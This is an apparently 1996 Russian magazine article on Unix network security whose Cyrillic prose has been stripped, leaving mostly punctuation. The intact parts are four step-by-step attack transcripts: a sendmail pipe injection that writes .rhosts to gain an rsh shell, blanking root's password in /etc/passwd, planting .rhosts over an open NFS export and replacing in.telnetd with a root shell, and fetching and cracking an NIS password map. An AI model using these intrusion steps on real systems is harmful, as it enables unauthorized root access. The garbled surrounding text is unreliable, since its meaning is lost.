http://www.osp.ru/os/os_1_96/source/crack.htm

· # 4(18)/96 · . 28-30

. ,

" ", lsu@kiae.su
---------------------------------------------------------------
Unix
IP-

TCP/IP Internet. , . , , . Internet . , , . CERT.

, , Internet, . "", . , Unix, .

. IP sendmail, . , Unix-. , . passwd , rlogin, rsh shell ( 1).

1

crack% telnet target.remote.com 25 
Connecting to 123.456.654.321. 
!    25 -  SMTP 
220 sendmail SMI/4.3.5.2 ready 
! ,   ,  . 
helo xxx 
220 Helo xxx, ( crack.edu ) 
mail from: "|echo crack.edu>/.rhosts"@target.remote.com 
!     . 
200 Sender ok. 
rcpt to: nosuchuser 
!     
500 nosuchuser: user unknown 
!   ,  . 
data 
230 Enter mail, end with "." 
200 Mail accepted 
! ,  .... 
quit 
crack% su 
!    ,       who 
# rsh target.remote.com /bin/csh -i 
Welcome to remote.com! 
Warning! No access to terminal, job control disabled! 
target# 

Unix . , : Sun, SunOS 4, NIS , , ( 2).

2

crack# su - bin 
$ rsh target.remote.com /bin/csh -i 
!   /etc/hosts.equiv   "+"  ... 
Welcome to remote.com! 
!  /etc   bin... 
Warning! No access to terminal, job control disabled! 
% ls -ldg /etc 
drwxr-xr-x 10 bin bin 1536 Apr 10 01:45 /etc/ 
% cd /etc 
!  passwd    ... 
% mv passwd passwd.was 
% cp passwd.was passwd 
!  
% ed passwd 
2341 
1p 
root:Nkkh&5gkljGyj:0:0:Root:/:/bin/csh 
s/Nkkh&5gkljGyj//p 
root::0:0:Root:/:/bin/csh 
w 
2341 
q 
!   . 
%echo /bin/csh -i | su root 
Warning! No access to terminal, job control disabled! 
target# mv /etc/passwd.was /etc/passwd 
!    ,   . 

TCP/IP , Network File System (NFS).

/etc/exports (SunOS 4.1) ( 3).

3

crack% showmount -e target.remote.com 
Export list for target.remote.com 
/home Everyone 
/disk3 neptun pluton alpha 
!     NFS 
crack% su 
# mount -t nfs target.remote.com:/home /mnt 
# cd /mnt 
!     
# ls -ldg * 
drwxr-xr-x 10 257 20 1536 Apr 10 01:45 user/ 
# echo crack.edu > user/.rhosts 
!  .rhosts   
# cat >> /etc/passwd 
user::257:20::/: 
^D 
!      
# su - user 
!   
$ rsh target.remote.com /bin/csh -i 
Warning! No access to terminal, job control disabled! 
!      
% id 
uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys) 
% ls -ldg /usr/etc 
!     
drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc 
% grep telnet /etc/inetd.conf 
telnet stream nowait root /usr/etc/in.telnetd in.telnetd 
!  ,   
! root"    
% cd /usr/etc 
% mv in.telnetd in.telnetd1 
!    
% cat > in.telnetd 
#!/bin/sh 
exec /bin/csh -i 
^D 
% chmod 755 in.telnetd 
!    
% telnet 127.1 
Connecting 127.1. 
Warning! No access to terminal, job control disabled! 
# chown user /etc; 
!  /etc  
^M: command not found 
# exit; 
^M: command not found 
Connection closed by foreign host. 
% cd /etc 
!        1. 
....... 

NIS- , "" passwd, . , , crack . ( 4) ( , ).

4

!   NIS  
crack% rpcinfo -p target.remote.com | grep bind 
120000 2 udp 2493 ypbind 
!  ... 
crack% ypx -o target.passwd -g target.remote.com 
!    
crack% crack target.passwd 
!     
[ a lot of time ] 
OK, user "user" has password "iamuser" 
! ,  
crack% telnet target.remote.com 
!     . 
..... 

, , . , . (cisco, wellfleet...) Unix- (Sun, DEC, BSDI, FreeBSD). . , / . rlogin, rsh, RPC (. ), , 2048 2049, - NFS. , , 25 . , - , TCP- . ( . firewall - ). " " (software firewall). , IP-, . , , (telnet, ftp...), , , . . , , ftp arch.kiae.su, :

:

telnet, rlogin, X11 ..

"" . , "" . ? , - , , Ethernet. , , . , , , NFS. , , , . , .

80- Kerberos. . , "" , . , , . . , , , - . , , . , , , , , . . . , . . -, . , , , telnet , , , . , Kerberos 4 . , Kerberos, , , . Kerberos 4 , , Kerberos ( , ..). , , 5, . Sphinx DEC NIS+ Sun. , (RPC UDP) .

, , , . "" . - , . He " ", - "" , .


Last-modified: Mon, 05 May 1997 07:36:09 GMT